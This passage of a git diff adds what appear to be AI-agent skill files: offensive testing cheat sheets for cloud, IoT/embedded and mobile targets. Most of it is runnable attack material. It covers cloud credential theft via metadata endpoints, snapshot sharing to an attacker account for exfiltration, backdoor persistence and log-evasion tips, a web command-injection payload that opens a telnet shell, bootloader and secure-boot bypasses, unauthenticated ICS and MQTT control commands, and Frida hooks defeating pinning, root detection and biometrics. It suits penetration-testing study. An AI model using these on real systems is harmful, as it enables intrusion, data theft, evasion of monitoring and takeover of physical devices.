Self-elevate | +| `iam:UpdateAssumeRolePolicy` | On a privileged role | Add yourself as principal | +| `iam:CreateLoginProfile` (on user without one) | Set console password | Console access | +| `iam:CreateAccessKey` (on another user) | Mint keys for someone else | Persistent access | +| `sts:AssumeRole` with `sts:TagSession` to ABAC role | If role trusts session tags | Tag-based escalation | +| `cloudformation:CreateStack` + permissive role | Run any service action | Indirect arbitrary perms | +| `glue:UpdateDevEndpoint` | Inject SSH key into Glue endpoint | Code exec as Glue role | +| `ssm:SendCommand` to any instance | RCE on instances + their roles | Lateral + escalation | + +```bash +# Pacu — the tooling for AWS escalation +pacu +> import_keys default +> run iam__enum_permissions +> run iam__privesc_scan +``` + +### Cross-Account / Organization + +```bash +# Find roles trusting the current account +aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument!=null]' +# Then grep AssumeRolePolicyDocument.Statement for trusts to your account + +# Org-wide (if Organizations access) +aws organizations list-accounts +aws organizations list-roots +``` + +### Data Targets + +```bash +# S3 +aws s3api list-buckets +aws s3 ls s3:// --recursive | head +aws s3api get-bucket-policy --bucket + +# Cross-region snapshot share (data exfil without S3) +aws ec2 modify-snapshot-attribute --snapshot-id snap-... \ + --attribute createVolumePermission \ + --create-volume-permission "Add=[{UserId=ATTACKER_ACCT}]" + +# RDS snapshot share +aws rds modify-db-snapshot-attribute --db-snapshot-identifier mysnap \ + --attribute-name restore --values-to-add ATTACKER_ACCT + +# Secrets Manager / Parameter Store +aws secretsmanager list-secrets +aws ssm get-parameters-by-path --path / --recursive --with-decryption +``` + +### Persistence + +```bash +# Cross-account SCP exemption via service-linked role +# AWS Config snapshot delivery channel rerouted to attacker bucket +aws configservice put-delivery-channel ... # Rare but devastating + +# EventBridge rule firing Lambda you control on every IAM change +# Backdoor: Lambda creates an access key for any new admin user +``` + +### Detection Evasion + +- CloudTrail to multi-region with log file validation — disable validation if you have perms +- GuardDuty findings can be muted via `update-findings-feedback` if you have the permission (rare in prod) +- VPC Flow Logs only catch IP traffic; control-plane API calls are CloudTrail-only + +--- + +## Azure + +### Identity Discovery + +```bash +az account show +az ad signed-in-user show +az role assignment list --all --assignee $(az ad signed-in-user show --query id -o tsv) + +# Microsoft Graph +az rest --method GET --uri "https://graph.microsoft.com/v1.0/me" +``` + +### IMDS + +```bash +curl -H "Metadata:true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` + +### Privilege Escalation Paths + +| Path | Required Role / Permission | Outcome | +|------|---------------------------|---------| +| User Access Administrator on self/sub | Grant self Owner | Subscription Owner | +| App Registration owner | Add cert/secret, mint app-only tokens | App's permissions | +| Virtual Machine Contributor + Reader on KV | Run command on VM with MSI → KV | Secrets | +| Custom role with `*/write` on RBAC | Edit role assignments | Self-elevate | +| Logic App contributor | Edit workflow → privileged action | Indirect any action | +| Automation Account contributor | RunBook with Run-As account | Run as RunAs identity | +| AAD `Application Administrator` | Assign app to high-priv role | Cloud admin via app | +| AAD `Cloud Application Administrator` | Same minus on-prem | Cloud admin | +| AAD `Directory Synchronization Account` | DCSync via AAD Connect | All on-prem hashes | +| Privileged Authentication Administrator | Reset MFA / passwords for Globals | Global Admin reset | + +```bash +# ROADtools — the AAD enumeration toolkit +roadrecon auth -u user@tenant -p pass +roadrecon gather +roadrecon gui # browse the gathered DB + +# AzureHound for BloodHound integration +azurehound list -u user -p pass --tenant tenant.onmicrosoft.com +``` + +### Data Targets + +```bash +# Storage account access keys (gold) +az storage account keys list -g RG -n SA + +# Key Vault (per RBAC + access policies) +az keyvault secret list --vault-name myvault +az keyvault secret show --vault-name myvault -n cred + +# Cosmos DB primary keys +az cosmosdb keys list -g RG -n acct + +# SQL admin reset +az sql server ad-admin create -g RG -s server -u attacker@tenant -i +``` + +### Persistence + +```bash +# Add cert to existing privileged AAD application +az ad app credential reset --id --append + +# Conditional Access bypass: add own service principal to "trusted locations" / exclusions +# Custom rules to AAD Audit log retention +``` + +### Detection Evasion + +- AAD Audit Log: tenant-level, can't be tampered with from below Global Admin +- Microsoft Sentinel: rule shaping if you have Workbook / Analytics Rule write +- Defender for Cloud: alert suppression rules + +--- + +## GCP + +### Identity Discovery + +```bash +gcloud auth list +gcloud projects list +gcloud iam service-accounts list +gcloud projects get-iam-policy $(gcloud config get-value project) +``` + +### IMDS + +```bash +curl -H "Metadata-Flavor: Google" \ + http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` + +### Privilege Escalation Paths + +| Path | Required Permission | Outcome | +|------|---------------------|---------| +| `iam.serviceAccountTokenCreator` on SA | Mint tokens as SA | SA's perms | +| `iam.serviceAccountUser` + `compute.instances.create` | Pass SA to new VM | Run as SA via IMDS | +| `iam.serviceAccountKeyAdmin` | Create JSON key for any SA | Persistent SA creds | +| `cloudbuild.builds.create` | Build runs as Cloud Build SA (often Editor) | Editor on project | +| `deploymentmanager.deployments.create` | Runs as DM SA (often Owner) | Owner | +| `cloudfunctions.functions.create` + actAs | Pass any SA to function | Run as that SA | +| `dataflow.jobs.create` + actAs | Same pattern | SA's perms | +| `iam.roles.update` (custom roles) | Add permissions to a role you have | Self-elevate | +| `resourcemanager.projects.setIamPolicy` | Grant self any role | Owner | + +```bash +# gcp_enum / gcp_scanner +git clone https://github.com/google/gcp_scanner +python gcp_scanner.py -k gcp.json -o out/ + +# Hunt for SA impersonation paths +gcloud iam service-accounts get-iam-policy +# Look for ServiceAccountTokenCreator on something you control +``` + +### Data Targets + +```bash +# GCS buckets +gcloud storage ls +gsutil ls -L gs://bucket +gsutil iam get gs://bucket + +# Cloud SQL +gcloud sql instances list +gcloud sql users list --instance + +# Secret Manager +gcloud secrets list +gcloud secrets versions access latest --secret= +``` + +### Cross-Project / Folder Pivot + +```bash +# Org-level perms? +gcloud organizations list +gcloud resource-manager folders list --organization +gcloud projects list --filter="parent.id=" +``` + +--- + +## Cross-Cloud Patterns + +### CI/CD as the Pivot + +Most cloud takeovers in 2024-2025 start with CI tokens: +- GitHub Actions OIDC misconfigured → assume any AWS role with weak `sub` claim +- GitLab CI pushed to wrong branch → gains prod role +- Jenkins agent with cloud credentials in env + +Test the OIDC trust policy claims carefully: + +```json +"Condition": { + "StringLike": { + "token.actions.githubusercontent.com:sub": "repo:org/*" + } +} +``` + +### Snapshot Sideways (works on all 3) + +Take a snapshot of a victim VM/disk → share or mount it under a controlled account → extract data offline. Bypasses host-level guardrails. + +### Secrets-in-Logs + +CloudTrail / Activity Log / Cloud Audit Logs sometimes log request bodies. Look for SaaS integrations that POST API keys — they may end up in audit logs. + +### Container Registry Poisoning + +ECR/ACR/Artifact Registry — if you have push perms on a tag in use by production, replace the image. Tag mutability is the bug. + +--- + +## Tooling Matrix + +| Tool | AWS | Azure | GCP | Use | +|------|-----|-------|-----|-----| +| ScoutSuite | ✓ | ✓ | ✓ | Posture audit | +| Prowler | ✓ | ✓ | ✓ | CIS/PCI checks | +| Pacu | ✓ | | | Offensive framework | +| CloudGoat | ✓ | | | Vulnerable lab | +| BloodHound + AzureHound | | ✓ | | Graph-based escalation | +| ROADtools | | ✓ | | AAD recon + offline analysis | +| MicroBurst | | ✓ | | PS-based offensive | +| Stormspotter | | ✓ | | MS' own offensive enum | +| gcp_scanner | | | ✓ | Token-based recon | +| GCPBucketBrute | | | ✓ | GCS bucket discovery | + +--- + +## Engagement Cheatsheet + +``` +[ ] sts/get-caller-identity, az account show, gcloud auth list +[ ] Enumerate effective permissions (simulate-principal-policy / get-iam-policy) +[ ] Map known privesc paths against current perms +[ ] Pacu/ROADtools/gcp_scanner full enumeration +[ ] Identify data crown jewels (S3/Blob/GCS, KV, secrets) +[ ] Test cross-account/tenant/project trust paths +[ ] Test CI/CD OIDC trust policies +[ ] Test backup/snapshot exfiltration paths +[ ] Document discovered identities, paths, and data with timestamps +[ ] Persistence demonstrated only with explicit authorization +``` + +--- + +## Key References + +- AWS IAM permissions reference (boto3 docs) +- Azure RBAC built-in roles + actions list +- GCP IAM permissions reference +- HackTricks Cloud — ongoing reference for newest paths +- "Pacu" framework docs — pacu.aws.cloud +- MITRE ATT&CK Cloud Matrix +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/cloud.md diff --git a/Skills/offensive-iot/SKILL.md b/Skills/offensive-iot/SKILL.md new file mode 100644 index 0000000..6524d6f --- /dev/null +++ b/Skills/offensive-iot/SKILL.md @@ -0,0 +1,435 @@ +--- +name: offensive-iot +description: "IoT and embedded device security testing methodology. Covers hardware reconnaissance (UART, JTAG, SWD, SPI flash, I2C EEPROM, eMMC chip-off), firmware acquisition (vendor portals, OTA capture, flash dump, binwalk extraction), firmware analysis (filesystem mounting, binary triage, hardcoded secrets, default credential discovery), bootloader attacks (U-Boot console, secure-boot bypass, fault injection), runtime attacks on embedded Linux/RTOS (busybox CVEs, MTD writes, /dev/mem), wireless protocol attacks (Zigbee, BLE, Z-Wave, LoRaWAN, Thread/Matter, sub-GHz), MQTT/CoAP/Modbus/BACnet/OPC-UA exploitation, mobile companion app analysis, cloud-IoT API abuse, and side-channel/glitching basics. Use for IoT pentest, smart-home assessment, ICS/OT testing, or embedded vulnerability research." +--- + +# IoT & Embedded — Offensive Testing Methodology + +## Quick Workflow + +1. **Recon the device physically** — identify SoC, flash, debug interfaces, radios +2. **Get the firmware** — vendor download, OTA capture, hardware dump, or chip-off +3. **Unpack and analyze** — filesystems, services, secrets, default creds, vuln components +4. **Establish runtime access** — UART shell, telnet/SSH default creds, exploit chain +5. **Pivot** — to companion app, cloud API, neighboring devices via mesh / wireless + +--- + +## Hardware Reconnaissance + +### PCB Inspection + +- ID the **SoC** by markings (Realtek, Mediatek, Espressif, Broadcom, Allwinner, NXP, STM32, etc.) +- ID **flash** (8-pin SOIC = SPI NOR; BGA = eMMC; TSOP = NAND) +- Find **debug headers**: TX/RX/GND/VCC pads (UART), 4–10 pin (JTAG), 4 pin (SWD) +- Find test points labeled `TX`, `RX`, `TCK`, `TMS`, `TDO`, `TDI`, `RST`, `BOOT` + +### Tools + +| Tool | Use | +|------|-----| +| Multimeter | Identify GND, VCC rails before connecting | +| Logic analyzer (Saleae, DSLogic) | Find UART baud, SPI clock, identify protocols | +| USB-UART (FT232, CP2102) | UART console | +| Bus Pirate / Glasgow | UART, SPI, I2C, JTAG generic | +| J-Link / Black Magic Probe | JTAG / SWD MCU debugging | +| CH341A programmer | Cheap SPI flash dumper | +| XGecu T48 | Modern universal programmer (NAND/eMMC/SPI) | +| ChipQuik / hot-air | Chip-off desolder | + +### UART Discovery + +```bash +# Find baud rate +for b in 9600 19200 38400 57600 115200 230400 460800 921600; do + echo "=== $b ===" + timeout 5 minicom -b $b -D /dev/ttyUSB0 -C uart_$b.log +done +grep -l -E "U-Boot|Linux|Bootloader|console|login" uart_*.log +``` + +Look for: U-Boot console (often `Hit any key` countdown), Linux init messages, root shell on console, login prompt. + +### Bootloader Console Drop + +``` +# At U-Boot countdown, mash space or key listed +Hit any key to stop autoboot: 0 +=> printenv # full env, often includes boot args +=> setenv bootargs ${bootargs} init=/bin/sh +=> boot # Linux comes up to root shell, no login +``` + +If U-Boot is locked, try: +- `CONFIG_DELAY_AUTOBOOT_KEYED` keyword (vendor-specific) +- `Ctrl+C` / `Ctrl+B` / specific magic strings +- Glitch the U-Boot version-check / signature-check (see Fault Injection) + +--- + +## Flash Dumping + +### SPI NOR (most common consumer IoT) + +```bash +# In-circuit dump (hold SoC in reset to avoid bus contention) +flashrom -p ch341a_spi -r firmware.bin + +# Verify +file firmware.bin && binwalk firmware.bin +``` + +If the SoC fights you: desolder the SPI chip, dump in socket, re-solder. + +### eMMC / NAND + +eMMC is desolder-then-read: BGA-153/169 to SD adapter (cheap eBay), use a USB SD reader. + +NAND requires bit-flipping and ECC handling — `nanddump`/`yaffshiv`/`ubireader` post-extraction. + +### OTA Capture + +Many devices fetch firmware over HTTP(S). MITM the device: + +```bash +# Captive AP + transparent proxy +sudo create_ap wlan0 eth0 IoTLab +mitmproxy --mode transparent --showhost --ssl-insecure +# Or for non-SNI / pinning, use bettercap with custom DNS +``` + +Capture the URL, download directly, dissect. + +--- + +## Firmware Analysis + +### Initial Triage + +```bash +binwalk -Me firmware.bin # Extract recursively +binwalk -E firmware.bin # Entropy plot — flat = encrypted/compressed +strings firmware.bin | grep -iE "(passwd|key|token|admin|http|ssid)" +``` + +### Filesystem Mounting + +```bash +# SquashFS (most consumer Linux IoT) +unsquashfs -d rootfs squashfs.bin + +# JFFS2 / UBIFS (NAND-backed) +jefferson jffs2.bin -d rootfs +ubireader_extract_files ubi.bin -o rootfs +``` + +### Embedded-Linux Quick Wins + +```bash +# Hardcoded credentials and keys +grep -RIE "(BEGIN (RSA |DSA |EC )?PRIVATE KEY|api[_-]?key|secret|token|passwd|root:[^*])" rootfs/ +find rootfs -name "*.pem" -o -name "*.key" -o -name "shadow" + +# Telnet/SSH default creds +cat rootfs/etc/passwd rootfs/etc/shadow +grep -r "telnetd" rootfs/etc/init.d +grep -r "dropbear\|sshd" rootfs/ + +# Setuid binaries +find rootfs -perm -4000 -type f + +# Vulnerable busybox / dropbear / openssl versions +rootfs/bin/busybox 2>&1 | head -1 +strings rootfs/sbin/dropbear | grep "Dropbear v" +strings rootfs/usr/lib/libssl* | grep "OpenSSL " + +# Web admin: lighttpd / mini_httpd / boa / GoAhead — known CVE goldmine +find rootfs -name "lighttpd*" -o -name "boa" -o -name "goahead" -o -name "mini_httpd" +``` + +### CGI / Web Admin Auditing + +GoAhead, Boa, mini_httpd — abandoned codebases, command injection on every other CGI parameter. + +```bash +# Disassemble a CGI +file rootfs/www/cgi-bin/setup.cgi +# Often plain ELF MIPS/ARM — analyze in Ghidra +ghidra-headlessAnalyzer -import rootfs/www/cgi-bin/setup.cgi +``` + +Common patterns: +- `system()` / `popen()` with concatenated query string args +- `sprintf` then `system` — easy command injection +- Auth check via comparing cookie to plaintext file (race / replay) + +--- + +## Runtime Exploitation + +### Console / Telnet Default Creds + +Try (per device class): `admin/admin`, `root/root`, `root/`, `admin/password`, `support/support`, `cisco/cisco`, vendor brand as user/pass. **Always try `root/`** — many vendors use a per-device default. + +### Web Admin Command Injection + +```http +POST /goform/setSysAdm +Cookie: SESSIONID=... +admin_user=admin&admin_pwd=password;telnetd -l /bin/sh -p 4444; +``` + +### MTD Writes (re-flash from runtime) + +If you have a root shell: + +```bash +cat /proc/mtd # list partitions +mtd_debug erase /dev/mtd2 0 0x10000 +mtd_debug write /dev/mtd2 0 0x10000 implant.bin +``` + +### /dev/mem + +On older kernels without `CONFIG_STRICT_DEVMEM`, `/dev/mem` is read/write to physical memory — full system compromise from any root context. + +--- + +## Bootloader / Secure Boot Attacks + +### U-Boot Quick Bypasses + +- `setenv bootargs ${bootargs} init=/bin/sh` +- `setenv preboot 'echo 1 > /sys/...'` (run command before kernel) +- `tftpboot` — load attacker kernel from network +- `bootm` of a memory-resident image you `loadb`-uploaded over UART + +### Secure Boot + +Modern devices verify signed bootloaders / kernels. Bypass paths: + +- **Downgrade**: flash an older signed image with known kernel-level CVE +- **Rollback bypass**: anti-rollback fuses not blown → flash older signed +- **Key extraction**: dump the OTP / fuse contents via vendor tooling, recover signing key +- **Fault injection**: glitch the signature-check instruction (see below) + +### Fault Injection (Voltage / Clock Glitching) + +``` +Tools: ChipWhisperer-Lite/Husky, PicoEMP, custom MOSFET crowbar +Target: NAND/eMMC bootrom signature check, U-Boot env-protection check, OTP read +Procedure: + 1. Locate target instruction window via UART timing or power trace + 2. Apply glitch (V drop / EM pulse) at that offset + 3. Sweep delay and width; success = corrupted check, accepted unsigned image +``` + +--- + +## RTOS Targets + +| RTOS | Notes | +|------|-------| +| FreeRTOS | Single binary, no MMU often → stack overflow → straight RIP control | +| Zephyr | MMU/MPU optional; verify isolation actually enabled | +| ThreadX | Microsoft now, mostly closed | +| MicroEJ / Mbed OS | Java/C mix — type confusion and JNI bridges | +| ESP-IDF (Espressif) | Wi-Fi/BLE stacks, OTA chain, secure boot v2 | +| QNX | Older versions: pdebug shell on serial = root | + +### MCU Reverse Engineering + +```bash +# Read protected MCU via SWD / JTAG (if RDP not set) +openocd -f interface/jlink.cfg -f target/stm32f4x.cfg \ + -c "init; halt; flash read_bank 0 fw.bin 0 0x100000; exit" + +# SAM-BA on Atmel SAM +sam-ba -p \\.\COM3 -d at91sam7s256 -a "read_flash(0,0x40000,fw.bin)" + +# Ghidra / Binary Ninja with appropriate processor module (ARM Cortex-M, ESP32 Xtensa, AVR, MSP430) +``` + +--- + +## Wireless Protocols + +### Bluetooth Low Energy (BLE) + +```bash +# Discover and enumerate +bettercap -eval "ble.recon on; events.show 60; ble.show" + +# GATT introspection +gatttool -b AA:BB:CC:DD:EE:FF -I +> connect +> primary +> char-desc +> char-read-uuid +> char-write-req +``` + +Attack surface: characteristic write without auth, pairing downgrade ("Just Works" forced), session key reuse, app-side TLS-equivalent missing. + +### Zigbee / Thread / Matter + +```bash +# Sniff with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E +zbstumbler -i 0 +zbdump -c 11 -w zigbee.pcap + +# KillerBee — replay, scapy-dot15d4 for fuzzing +zbreplay -f zigbee.pcap -i 0 +``` + +Touchlink commissioning: known transport key in the wild (`0x9F559A553B7A6B2C…`) — many consumer devices accept Touchlink commissioning from any nearby radio. + +### Z-Wave + +S0 security uses fixed network-key derivation; S2 fixes this. Older bulbs / locks still on S0 are attackable with `Z-Force` / `EZ-Wave`. + +### LoRaWAN + +- ABP-provisioned devices: keys flashed once and never rotated +- Join-request replay if frame counters reset +- `LoRaPWN`, `ChirpStack` for analysis + +### Sub-GHz (433 / 868 / 915 MHz) + +```bash +# HackRF / RTL-SDR +rtl_433 -f 433.92M -A # auto-decoder for many devices +gqrx # interactive + +# Capture, analyze in Inspectrum, replay with hackrf_transfer +``` + +Targets: garage doors (KeeLoq rolling-code analysis), smart plugs (fixed code = easy replay), tire-pressure monitors (TPMS spoofing), industrial telemetry. + +--- + +## ICS / OT Protocols + +### Modbus + +```python +from pymodbus.client import ModbusTcpClient +c = ModbusTcpClient('10.0.0.5', port=502) +c.read_holding_registers(0, count=20, slave=1) +c.write_register(40, 1, slave=1) # No auth in the protocol +``` + +### BACnet (Building Automation) + +```bash +# UDP/47808 +bacnet-stack/who-is 10.0.0.0/24 +# Read property without auth in many deployments +``` + +### OPC-UA + +Modern OPC-UA has security profiles; many deployments use `None` for compatibility. Test: +- Anonymous browsing of address space (information disclosure) +- Username/password endpoints with weak creds +- Cert-based but with self-signed accepted + +### S7 (Siemens) + +Snap7 library; PLC start/stop, DB read/write commands historically unauthenticated. Stuxnet's surface. + +--- + +## MQTT / CoAP + +### MQTT Anonymous Subscribe + +```bash +mosquitto_sub -h target.broker -t '#' -v +# # = wildcard, prints every retained message → secrets, sensor data, control topics +mosquitto_pub -h target.broker -t cmd/lock/+/unlock -m '1' +``` + +Many cloud brokers don't restrict topic ACL by default — connect with empty creds, subscribe `#`, replay device commands. + +### CoAP + +```bash +coap-client -m get coap://device/.well-known/core +coap-client -m put coap://device/relay/0 -e '1' +``` + +DTLS often misconfigured (PSK in firmware, no rotation). + +--- + +## Companion Mobile App / Cloud API + +Most IoT vulns today live in the **cloud + companion app pair**, not the device itself. + +```bash +# Decompile Android companion +apktool d Vendor.apk -o app +jadx -d app_src Vendor.apk + +# Look for: API base URL, signing keys, MQTT broker creds, device-claim flow +grep -rE "(api\.vendor|broker|amazonaws|azure|firebase|s3\.)" app_src/ + +# Patch SSL pinning (frida) +frida -U -l ssl-pin-bypass.js -f com.vendor.app +``` + +Test the cloud API for: +- Device claim by serial number alone (steal devices already shipped) +- IDOR on `/devices/` endpoints +- Live-stream URLs without auth (RTSP / WebRTC tokens) +- Firmware signing endpoint accepting attacker-uploaded blobs (rare but devastating) + +--- + +## Pivoting Across Devices + +- Compromise one device on the LAN → ARP/DHCP poison neighbors +- Mesh-protocol bridges (Zigbee coordinator, Z-Wave hub) → adjacent device control +- BLE central role swap → talk directly to peripherals as the legitimate hub +- Cloud account compromise → all devices linked to the account simultaneously + +--- + +## Reporting Hooks + +For each finding capture: +- **Affected scope**: model, firmware version, region, serial-number range if known +- **Reproducer**: physical or remote, time-to-exploit +- **Pre-conditions**: physical access? same network? authenticated cloud account? +- **Post-conditions**: persistent? cross-device? cloud-side? +- **Vendor disclosure path**: PSIRT contact, ICS-CERT, MITRE for CVE assignment + +--- + +## Engagement Checklist + +``` +[ ] Photo PCB top + bottom; identify SoC, flash, radios +[ ] Try UART at common bauds; capture boot log +[ ] Pull SPI flash; binwalk -Me; identify rootfs +[ ] Static review: creds, keys, vuln versions, CGI +[ ] Boot the device; map services on ports +[ ] Try default creds, web/CGI command injection +[ ] Capture OTA traffic; analyze update flow +[ ] Pair with companion app; intercept all traffic with TLS-bypass +[ ] Map cloud API surface; test IDOR and device-claim +[ ] For each radio: passive sniff, active probe, replay +[ ] Document CVE-eligible findings; coordinate vendor disclosure +``` + +--- + +## Key References + +- MITRE ATT&CK for ICS — TA0108 (Initial Access), TA0104 (Execution) +- OWASP ISVS / IoT Top 10 +- Embedded Security CTF (microcorruption.com) — practice MCU exploitation +- IoT Hackers Handbook (Aditya Gupta) — canonical methodology +- CISA ICS-CERT advisory feed +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/iot-embedded.md diff --git a/Skills/offensive-mobile/SKILL.md b/Skills/offensive-mobile/SKILL.md new file mode 100644 index 0000000..29d6290 --- /dev/null +++ b/Skills/offensive-mobile/SKILL.md @@ -0,0 +1,422 @@ +--- +name: offensive-mobile +description: "Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, providers, receivers; iOS XPC, URL schemes, universal links), insecure data storage (SharedPrefs, KeyStore misuse, NSUserDefaults, Keychain ACL bypass), IPC / Intent redirection, WebView vulnerabilities (JavaScriptInterface, file:// access), Firebase/AWS/Azure misconfiguration leakage, mobile API testing, biometric/Face ID/Touch ID bypass, app-cloning and runtime patching, and mobile malware/RAT analysis primitives. Use for mobile pentest, bug bounty mobile triage, or app-store reconnaissance." +--- + +# Mobile (Android + iOS) — Offensive Testing Methodology + +## Quick Workflow + +1. Static: pull the IPA/APK, decompile, dump resources/strings, identify endpoints +2. Dynamic: install on rooted/jailbroken device, hook with Frida, intercept TLS +3. Map exported attack surface: deep links, URL schemes, exported components +4. Storage / Keystore audit: where do secrets live, what protects them +5. API: every backend the app talks to is your scope — test like a web app + +--- + +## Lab Setup + +### Android +- Rooted device or **Genymotion** / Android Studio AVD with `userdebug` build +- **Magisk** for systemless root; **LSPosed** for hooks; **Frida server** matching device arch +- **Burp / Mitmproxy** with system-trusted CA via Magisk module (`MagiskTrustUserCerts`) + +### iOS +- Jailbroken device (palera1n / checkra1n / Dopamine depending on iOS version) +- **Frida** + **Objection** + **Filza** + **SSH via USB (iproxy 2222 22)** +- Burp CA installed via Settings → General → Device Management → Certificate Trust Settings + +--- + +## Static Analysis + +### Android + +```bash +# Decode resources + smali +apktool d app.apk -o app + +# Decompile to Java +jadx -d app_src app.apk + +# Manifest review +xmllint --format app/AndroidManifest.xml | less +# Look for: android:exported="true", intent-filters, custom permissions, debuggable, allowBackup, networkSecurityConfig +``` + +```bash +# Secrets and endpoints +grep -rE '(https?://[a-z0-9.-]+|api[_-]?key|secret|token|firebase|amazonaws|appspot)' app_src/ +grep -r "Log\.[dwief]" app_src/ # leftover debug logs + +# Native libs +file app/lib/*/*.so +# RE in Ghidra/IDA; look for JNI_OnLoad and exported Java_* functions +``` + +### iOS + +```bash +# Pull IPA from device +frida-ios-dump -o app.ipa "com.vendor.app" + +# Or via App Store via 3rd-party tools (Apple Configurator with paid acct, etc.) +unzip app.ipa +# Decrypt if needed (jailbroken device): bagbak / clutch +bagbak com.vendor.app + +# Class dump +class-dump-dyld -H Payload/App.app/App -o headers/ +# Or for Swift symbols, use Hopper / IDA + +# Strings / endpoints +strings -a Payload/App.app/App | grep -E '(https?://|key|secret|api)' +``` + +```bash +# Info.plist analysis +plutil -p Payload/App.app/Info.plist +# Look for: NSAppTransportSecurity exceptions, CFBundleURLTypes (URL schemes), +# associated-domains entitlements, UIFileSharingEnabled, ATS exemptions +``` + +--- + +## Dynamic Analysis & Frida + +### Common Hooks + +```javascript +// Bypass SSL pinning (Android — generic OkHttp/CertificatePinner/TrustManager) +Java.perform(() => { + const X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); + const TrustManagerFactory = Java.use('javax.net.ssl.TrustManagerFactory'); + // ... full bypass scripts: codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida +}); + +// Bypass root detection +Java.perform(() => { + const File = Java.use('java.io.File'); + File.exists.implementation = function () { + const path = this.getAbsolutePath(); + if (path.includes('su') || path.includes('Magisk')) return false; + return this.exists(); + }; +}); + +// iOS — bypass jailbreak detection +const stat = Module.findExportByName(null, 'stat'); +Interceptor.attach(stat, { + onEnter(args) { + const path = args[0].readUtf8String(); + if (/Cydia|jailbreak|substrate|frida/i.test(path)) { + args[0] = Memory.allocUtf8String('/nonexistent'); + } + } +}); +``` + +### Objection (Frida-based shortcuts) + +```bash +objection -g com.vendor.app explore +# Then inside: +android sslpinning disable +android root disable +android hooking list activities +android intent launch_activity com.vendor.app/.SecretActivity +ios sslpinning disable +ios jailbreak disable +ios keychain dump +``` + +--- + +## SSL / TLS Interception + +### Android Network Security Config + +App with `` requiring its own pinned CA: edit `res/xml/network_security_config.xml`, repack: + +```bash +apktool b app -o app-patched.apk +apksigner sign --ks debug.keystore app-patched.apk +``` + +Or live-bypass with Frida (preferred — no recompile). + +### iOS ATS / Pinning + +For pinning, use Frida hooks against `SecTrustEvaluate*` / `NSURLSession` delegate methods. ATS exceptions in Info.plist (`NSAllowsArbitraryLoads`) make MITM trivial without pinning. + +--- + +## Exported / IPC Attack Surface + +### Android — Exported Components + +```bash +drozer console connect +> run app.package.attacksurface com.vendor.app +> run app.activity.start --component com.vendor.app .ExportedActivity \ + --extra string url 'javascript:alert(1)' +> run app.provider.query content://com.vendor.app.provider/secrets +``` + +Targets: +- `exported="true"` activities → call from another app, bypass auth +- ContentProviders without `grantUriPermissions` → arbitrary read +- Receivers handling `BOOT_COMPLETED` etc. with privileged actions +- Services bound by intent extras → command injection + +### Intent Redirection / PendingIntent Hijack + +```java +// Vulnerable: PendingIntent with implicit Intent given to untrusted app +PendingIntent.getActivity(this, 0, new Intent(), FLAG_MUTABLE) +// Attacker fills the empty Intent → action runs with victim app's identity +``` + +### iOS — URL Schemes / Universal Links + +```bash +# Open custom scheme (test from another app) +plutil -p Payload/App.app/Info.plist | grep -A 5 CFBundleURLTypes +# Then on device: +xcrun simctl openurl booted "vendorapp://payment?to=ATTACKER&amount=9999" +``` + +Universal Links: check `apple-app-site-association` on the linked domain — open redirect on that domain → universal-link claim → in-app webview navigation. + +### iOS XPC / Mach Services + +`launchctl list | grep com.vendor` enumerates the app's launch services. XPC handlers without proper audit-token validation accept messages from any process. + +--- + +## Insecure Data Storage + +### Android + +```bash +# On device (root), pull app data +adb shell "su -c 'tar -cz /data/data/com.vendor.app'" > app_data.tgz +``` + +Inspect: +- `shared_prefs/*.xml` — preferences in plaintext +- `databases/*.db` — SQLite (use `sqlite3` to dump) +- `files/` — arbitrary writes +- `cache/` and external storage (`sdcard/Android/data/...`) — often readable across apps + +### Android Keystore Misuse + +- Keys created without `setUserAuthenticationRequired(true)` → use any time process is running +- AES-GCM with reused IV (devs often hardcode IV) +- RSA without proper padding (PKCS1 v1.5 vs OAEP) + +### iOS Keychain + +```bash +# Objection +ios keychain dump +# Look for kSecAttrAccessible values: +# AlwaysThisDeviceOnly → readable when phone locked (bad for secrets) +# WhenUnlocked → standard +# AlwaysThisDeviceOnly → bypasses screen lock +``` + +iOS Data Protection classes: NSFileProtectionNone files are readable on a jailbroken device even when locked. + +--- + +## WebView Vulnerabilities + +### Android `addJavascriptInterface` + +If the app exposes a JS bridge with reflection-capable objects, JS in any loaded page = arbitrary Java method invocation. + +```javascript +// In a page loaded by the WebView +JSBridge.getClass().forName('java.lang.Runtime') + .getMethod('exec', String).invoke(JSBridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null), 'id') +``` + +### file:// and Content:// + +WebView with `setAllowFileAccessFromFileURLs(true)` + a HTML attachment that the user opens → reads any file the app can. + +### iOS WKWebView + +- `WKWebViewConfiguration.preferences.javaScriptCanOpenWindowsAutomatically` +- `wkScriptMessageHandler` exposed — same JS bridge concern as Android +- File URL load with `loadFileURL` and broad `allowingReadAccessTo` directory + +--- + +## Biometric / Auth Bypass + +### Android BiometricPrompt + +Apps using BiometricPrompt **without binding** the cryptographic operation to authentication can be bypassed by hooking the result callback. + +```javascript +Java.perform(() => { + const Cb = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback'); + Cb.onAuthenticationSucceeded.implementation = function (r) { + return this.onAuthenticationSucceeded(r); // accept whatever + }; + Cb.onAuthenticationFailed.implementation = function () { /* ignore */ }; +}); +``` + +### iOS LAContext + +`evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics)` — if the app trusts the boolean result without using a Keychain item bound to biometrics, you can flip it. + +```javascript +const LAContext = ObjC.classes.LAContext; +Interceptor.attach(LAContext['- evaluatePolicy:localizedReason:reply:'].implementation, { + onEnter(args) { + const cb = new ObjC.Block(args[4]); + const orig = cb.implementation; + cb.implementation = function(success, err) { orig.call(this, true, NULL); }; + } +}); +``` + +The fix on the dev side is to use a **biometric-bound key** in the Keychain — the bypass above doesn't yield key access. + +--- + +## Firebase / Cloud Misconfig 